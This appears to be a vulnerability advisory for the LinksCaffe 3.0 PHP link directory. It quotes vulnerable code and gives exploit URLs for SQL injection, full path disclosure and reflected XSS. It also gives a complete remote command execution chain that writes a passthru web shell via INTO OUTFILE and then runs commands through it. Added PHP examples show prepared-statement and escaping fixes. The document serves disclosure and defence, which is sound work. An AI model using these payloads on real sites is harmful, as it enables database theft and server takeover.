LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilities
Product : LinksCaffe 3.0
Website : http://gonafish.com/
Impact : manipulation of data / system access
Discovered by : Simo64 - Moroccan Security Team
[+] SQL injection
******************
[1] Vulnerable code at line 223 of links.php
code :
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat'
    ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());
$offset and $limit are taken straight from the request and interpolated into the
LIMIT clause unsanitized. LIMIT takes bare integers, so no quote is needed to break
out of the query and magic_quotes_gpc offers no protection here.
Exploit :
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
[2] Vulnerable code at line 516 of links.php
code :
if (!$newdays) {
    $newdays = $daysnew;
} else {
    $newdays = $newdays;
}
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays
    AND link_val = 'yes'") or die(mysql_error());
$newdays comes from the request; the check only substitutes the default when it is
empty and otherwise interpolates it unquoted into the query, so any non-empty value
is injected as-is.
Exploit :
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
[3] Vulnerable code at line 516 of links.php
code :
if ($action == "deadlink")
{
    ........
    $rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
    while ($row = mysql_fetch_array($rime)) {
        extract($row);
        echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";
        echo "<input type = 'hidden' name = 'link_id' value='$link_id'>
              <input type = 'hidden' name = 'cat_id' value='$cat_id'>
              <input type = 'hidden' name = 'link_name' value='$link_name'>
              <input type = 'hidden' name = 'link_url' value='$link_url'>
              <input type = 'hidden' name = 'link_desc' value='$link_desc'>
              <input type = 'hidden' name = 'link_email' value='$link_email'><br>
              <input type = 'submit' value = 'Dead Link'>";
    }
$link_id is not sanitized before being interpolated, unquoted, into the query, so it
can be used for SQL injection. Because the statement is SELECT *, a UNION payload
must supply the same number of columns as the links table.
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
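The following is an added example, not LinksCaffe code: the three queries above
rewritten with mysqli prepared statements so that $offset, $limit, $newdays and
$link_id are bound as integers instead of interpolated. It assumes an open mysqli
connection in $db, a PHP build with mysqlnd (for get_result), and keeps the column
names from the advisory; the helper int_param is hypothetical.

```php
<?php
// Added example, not LinksCaffe code: the three queries from links.php
// rewritten with mysqli prepared statements. Column and parameter names
// follow the advisory; $db is assumed to be an open mysqli connection.
declare(strict_types=1);

// Throw on MySQL errors instead of die(mysql_error()), which echoes the
// error text (and, with display_errors on, the install path) to the visitor.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// [1] LIMIT takes unquoted integers, so quoting or escaping cannot protect it;
// binding the values with type 'i' is what removes the injection.
function fetch_links(mysqli $db, string $cat, int $offset, int $limit): array
{
    $offset = max(0, $offset);
    $limit  = min(max(1, $limit), 100);     // cap page size
    $stmt = $db->prepare(
        "SELECT * FROM links WHERE link_val = 'yes' AND cat_id = ? " .
        "ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT ?, ?"
    );
    $stmt->bind_param('sii', $cat, $offset, $limit);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// [2] newdays: use the configured $daysnew unless a positive integer was supplied.
function count_new_links(mysqli $db, ?int $newdays, int $daysnew): int
{
    $days = ($newdays !== null && $newdays > 0) ? $newdays : $daysnew;
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM links " .
        "WHERE (TO_DAYS(NOW()) - TO_DAYS(links.date)) <= ? AND link_val = 'yes'"
    );
    $stmt->bind_param('i', $days);
    $stmt->execute();
    return (int) $stmt->get_result()->fetch_row()[0];
}

// [3] link_id: bound as an integer, so "-1 UNION SELECT ... INTO OUTFILE"
// is never parsed as SQL.
function fetch_link(mysqli $db, int $link_id): ?array
{
    $stmt = $db->prepare("SELECT * FROM links WHERE link_id = ?");
    $stmt->bind_param('i', $link_id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// Hypothetical request helper: FILTER_VALIDATE_INT rejects non-integers
// outright instead of silently casting them, so bad input gets a 400.
function int_param(string $name, ?int $default = null, int $min = 0): ?int
{
    $v = filter_input(INPUT_GET, $name, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => $min]]);
    if ($v === null) {          // parameter absent: use the default
        return $default;
    }
    if ($v === false) {         // present but not a valid integer
        http_response_code(400);
        exit('invalid parameter: ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8'));
    }
    return $v;
}

$cat     = (string) ($_GET['cat'] ?? '');
$offset  = int_param('offset', 0);
$limit   = int_param('limit', 10, 1);
$newdays = int_param('newdays', null, 1);
$link_id = int_param('link_id', null, 1);
```

Binding is the fix; the integer validation on top of it is defence in depth and
gives a clean 400 rather than a database error for the payloads in this advisory.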
[+] Full path disclosure :
When the injected query fails, the later mysql_fetch_* calls emit PHP warnings, and
with display_errors enabled those warnings reveal the absolute path of the
installation. Disabling display_errors and not echoing mysql_error() removes the leak.
PoC :
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*
Result :
Warning: Supplied argument is not a valid MySQL result resource in
/usr/home/simo64/linkscaffe/links.php on line 540
Warning: Supplied argument is not a valid MySQL result resource in
/usr/home/simo64/linkscaffe/links.php on line 549
Warning: Supplied argument is not a valid MySQL result resource in
/usr/home/simo64/linkscaffe/links.php on line 554
[+] Remote Command Execution
*****************************
Query [3] uses SELECT *, so a UNION with the same number of columns (fifteen in the
payload below) can be written to disk with INTO OUTFILE. This requires magic_quotes_gpc
= Off (the payload contains quotes that would otherwise be escaped), a MySQL account
holding the FILE privilege, a directory under the web root that the mysqld process
can write to (and that secure_file_priv, where set, permits), and a target file that
does not already exist. The absolute path comes from the full path disclosure above,
and the dropped file uses a short open tag, so short_open_tag must be enabled for it
to execute as PHP.
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*
Commands can then be executed through the dropped file :
http://localhost/linkscaffe/pipo.php?cmd=ls;id
[+] Cross Site Scripting
*************************
$tablewidth in counter.php is echoed into the page unsanitized, allowing reflected
XSS.
$newdays in links.php is echoed unsanitized, allowing reflected XSS.
$tableborder, $menucolor, $textcolor and $bodycolor in links.php are echoed into HTML
attributes unsanitized, allowing reflected XSS; the single quote followed by %3E in
the PoCs below closes the attribute and the tag. As the PoCs show, menu.inc.php can
also be requested directly.
PoC :
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+
http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]
http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]
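The following is an added example, not LinksCaffe code, showing how the layout
parameters listed above would be validated and escaped before being echoed into
attributes. It assumes the values end up in attributes such as width='...' and
bgcolor='...'; the helper names safe_width, safe_color and attr are hypothetical.

```php
<?php
// Added example, not LinksCaffe code: validate the layout parameters named in
// the advisory against an allowlist, then escape them for the attribute context.
declare(strict_types=1);

// Width: accept only an integer within a sane range; anything else gets the default.
function safe_width($v, int $default = 600): int
{
    $n = filter_var($v, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1, 'max_range' => 2000]]);
    return $n === false ? $default : $n;
}

// Colour: accept #rgb, #rrggbb or a plain colour word such as "white".
function safe_color($v, string $default = '#ffffff'): string
{
    if (is_string($v) &&
        preg_match('/\A(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})\z/', $v)) {
        return $v;
    }
    return $default;
}

// Attribute escaping. ENT_QUOTES matters here: the PoCs break out with a single
// quote, which htmlspecialchars leaves untouched under its default flags.
function attr(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
}

$tablewidth  = safe_width($_GET['tablewidth'] ?? null);
$tableborder = safe_width($_GET['tableborder'] ?? null, 0);
$menucolor   = safe_color($_GET['menucolor'] ?? null);
$textcolor   = safe_color($_GET['textcolor'] ?? null, '#000000');
$bodycolor   = safe_color($_GET['bodycolor'] ?? null);

echo "<body bgcolor='" . attr($bodycolor) . "' text='" . attr($textcolor) . "'>";
echo "<table width='" . attr((string) $tablewidth) . "' border='" . attr((string) $tableborder)
   . "' bgcolor='" . attr($menucolor) . "'>";
```

With the allowlist in place the escaping is belt and braces, but it is the part to
keep even if the validation is later relaxed, since an attribute written with single
quotes is only safe when ENT_QUOTES is passed.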
Contact : simo64@xxxxxxxxx
greetz to all friends !